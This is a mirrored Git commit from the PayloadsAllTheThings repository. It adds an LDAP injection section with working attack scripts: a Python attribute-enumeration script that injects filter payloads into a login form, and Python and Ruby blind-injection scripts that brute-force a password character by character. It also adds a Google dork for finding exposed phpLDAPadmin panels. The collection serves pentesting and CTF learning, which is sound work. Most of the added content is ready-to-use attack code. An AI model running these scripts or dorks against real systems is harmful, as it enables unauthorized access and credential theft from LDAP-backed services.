mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-14 15:22:51 +00:00
Merge pull request #159 from noraj/patch-1
LDAPi: add scripts and dorks
This commit is contained in:
commit
0b14b12fb4
1 changed files with 84 additions and 1 deletions
|
@ -96,9 +96,92 @@ userPassword:2.5.13.18:=\xx\xx
|
||||||
userPassword:2.5.13.18:=\xx\xx\xx
|
userPassword:2.5.13.18:=\xx\xx\xx
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## Scripts
|
||||||
|
|
||||||
|
### Discover valid LDAP fields
|
||||||
|
|
||||||
|
```python
|
||||||
|
#!/usr/bin/python3
|
||||||
|
|
||||||
|
import requests
|
||||||
|
import string
|
||||||
|
|
||||||
|
fields = []
|
||||||
|
|
||||||
|
url = 'https://URL.com/'
|
||||||
|
|
||||||
|
f = open('dic', 'r') #Open the wordlists of common attributes
|
||||||
|
wordl = f.read().split('\n')
|
||||||
|
f.close()
|
||||||
|
|
||||||
|
for i in wordl:
|
||||||
|
r = requests.post(url, data = {'login':'*)('+str(i)+'=*))\x00', 'password':'bla'}) #Like (&(login=*)(ITER_VAL=*))\x00)(password=bla))
|
||||||
|
if 'TRUE CONDITION' in r.text:
|
||||||
|
fields.append(str(i))
|
||||||
|
|
||||||
|
print(fields)
|
||||||
|
```
|
||||||
|
|
||||||
|
Ref. [5][5]
|
||||||
|
|
||||||
|
### Special Blind LDAP Injection (without "*")
|
||||||
|
|
||||||
|
```python
|
||||||
|
#!/usr/bin/python3
|
||||||
|
|
||||||
|
import requests, string
|
||||||
|
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"
|
||||||
|
|
||||||
|
flag = ""
|
||||||
|
for i in range(50):
|
||||||
|
print("[i] Looking for number " + str(i))
|
||||||
|
for char in alphabet:
|
||||||
|
r = requests.get("http://ctf.web?action=dir&search=admin*)(password=" + flag + char)
|
||||||
|
if ("TRUE CONDITION" in r.text):
|
||||||
|
flag += char
|
||||||
|
print("[+] Flag: " + flag)
|
||||||
|
break
|
||||||
|
```
|
||||||
|
|
||||||
|
Ref. [5][5]
|
||||||
|
|
||||||
|
```ruby
|
||||||
|
#!/usr/bin/env ruby
|
||||||
|
|
||||||
|
require 'net/http'
|
||||||
|
alphabet = [*'a'..'z', *'A'..'Z', *'0'..'9'] + '_@{}-/()!"$%=^[]:;'.split('')
|
||||||
|
|
||||||
|
flag = ''
|
||||||
|
|
||||||
|
(0..50).each do |i|
|
||||||
|
puts("[i] Looking for number #{i}")
|
||||||
|
alphabet.each do |char|
|
||||||
|
r = Net::HTTP.get(URI("http://ctf.web?action=dir&search=admin*)(password=#{flag}#{char}"))
|
||||||
|
if /TRUE CONDITION/.match?(r)
|
||||||
|
flag += char
|
||||||
|
puts("[+] Flag: #{flag}")
|
||||||
|
break
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
||||||
|
```
|
||||||
|
|
||||||
|
By [noraj](https://github.com/noraj)
|
||||||
|
|
||||||
|
## Google Dorks
|
||||||
|
|
||||||
|
```
|
||||||
|
intitle:"phpLDAPadmin" inurl:cmd.php
|
||||||
|
```
|
||||||
|
|
||||||
|
Ref. [5][5]
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
* [OWASP LDAP Injection](https://www.owasp.org/index.php/LDAP_injection)
|
* [OWASP LDAP Injection](https://www.owasp.org/index.php/LDAP_injection)
|
||||||
* [LDAP Blind Explorer](http://code.google.com/p/ldap-blind-explorer/)
|
* [LDAP Blind Explorer](http://code.google.com/p/ldap-blind-explorer/)
|
||||||
* [ECW 2018 : Write Up - AdmYSsion (WEB - 50) - 0xUKN](https://0xukn.fr/posts/WriteUpECW2018AdmYSsion/)
|
* [ECW 2018 : Write Up - AdmYSsion (WEB - 50) - 0xUKN](https://0xukn.fr/posts/WriteUpECW2018AdmYSsion/)
|
||||||
* [Quals ECW 2018 - Maki](https://maki.bzh/courses/blog/writeups/qualecw2018/)
|
* [Quals ECW 2018 - Maki](https://maki.bzh/courses/blog/writeups/qualecw2018/)
|
||||||
|
* \[5] [LDAP Injection - HackTricks][5]
|
||||||
|
|
||||||
|
[5]:https://book.hacktricks.xyz/pentesting-web/ldap-injection
|
||||||
|
|
Loading…
Reference in a new issue